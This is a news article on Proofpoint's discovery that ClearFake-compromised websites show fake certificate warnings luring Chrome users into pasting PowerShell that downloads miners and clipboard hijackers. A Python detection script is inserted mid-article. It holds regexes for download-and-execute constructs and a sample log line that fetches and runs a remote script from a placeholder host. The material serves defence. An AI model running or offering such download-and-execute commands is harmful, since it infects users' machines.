Proofpoint uncovers social engineering technique

By Dylan Bushell-Embling
Monday, 24 June, 2024

Proofpoint has uncovered a new social engineering technique that attempts to coerce victims into copying and pasting malicious PowerShell scripts that infect their computers with malware.

The technique targets users of Google’s popular Chrome web browser. It has been observed as early as 1 March by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.

As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ to be able to properly access the page. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.

In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.

The remote PowerShell script was used to download another PowerShell script, which itself read system temperatures as a check for virtual environments and sandboxes; if none were detected, it downloaded a fourth PowerShell script that fetched a file named data.zip and extracted its contents to find any .exe files.
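The chain described above leaves behaviours a defender can look for in PowerShell Script Block Logging text. As an added example (not from the original article or from Proofpoint), the Python below scores script-block text against the behaviours the advisory names; the regular expressions, the scoring rule and the sample log text are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Each behaviour named in the advisory, mapped to PowerShell constructs that
# commonly implement it. The patterns are illustrative assumptions, not
# Proofpoint's detection content; tune them against your own telemetry.
INDICATORS = {
    "dns_cache_flush": re.compile(r"Clear-DnsClientCache|ipconfig\s+/flushdns", re.I),
    "clipboard_cleared": re.compile(
        r"Set-Clipboard\s+-Value\s+(''|\x22\x22|\$null)|Clipboard\]::Clear", re.I),
    "decoy_message": re.compile(r"MessageBox\]::Show|Write-Host", re.I),
    "remote_download": re.compile(
        r"DownloadString|Invoke-RestMethod|Invoke-WebRequest|\birm\b|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
}

@dataclass
class Verdict:
    matched: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Flag only the download-then-execute pair combined with at least one
        # housekeeping step; a lone Invoke-WebRequest is ordinary admin use.
        m = set(self.matched)
        return ({"remote_download", "in_memory_exec"} <= m
                and bool(m & {"dns_cache_flush", "clipboard_cleared", "decoy_message"}))

def score_script_block(text: str) -> Verdict:
    """Match one script block (e.g. the text of a 4104 event) against the indicators."""
    v = Verdict()
    for name, rx in INDICATORS.items():
        if rx.search(text):
            v.matched.append(name)
    return v

def triage(blocks: dict) -> list:
    """Return the ids of script blocks whose behaviour matches the advisory's chain."""
    return [bid for bid, text in blocks.items() if score_script_block(text).suspicious]

# Constructed sample script-block texts; the URL is a defanged placeholder.
SAMPLE_BLOCKS = {
    "benign-admin": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\tmp\\r.csv",
    "pasted-chain": ("ipconfig /flushdns; Set-Clipboard -Value ''; "
                     "Write-Host 'Verification complete'; "
                     "iex (irm hxxp://example.invalid/stage2.ps1)"),
}

if __name__ == "__main__":
    print(triage(SAMPLE_BLOCKS))  # → ['pasted-chain']
```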

This method was then used to download payloads including cryptocurrency miners, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.

“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”
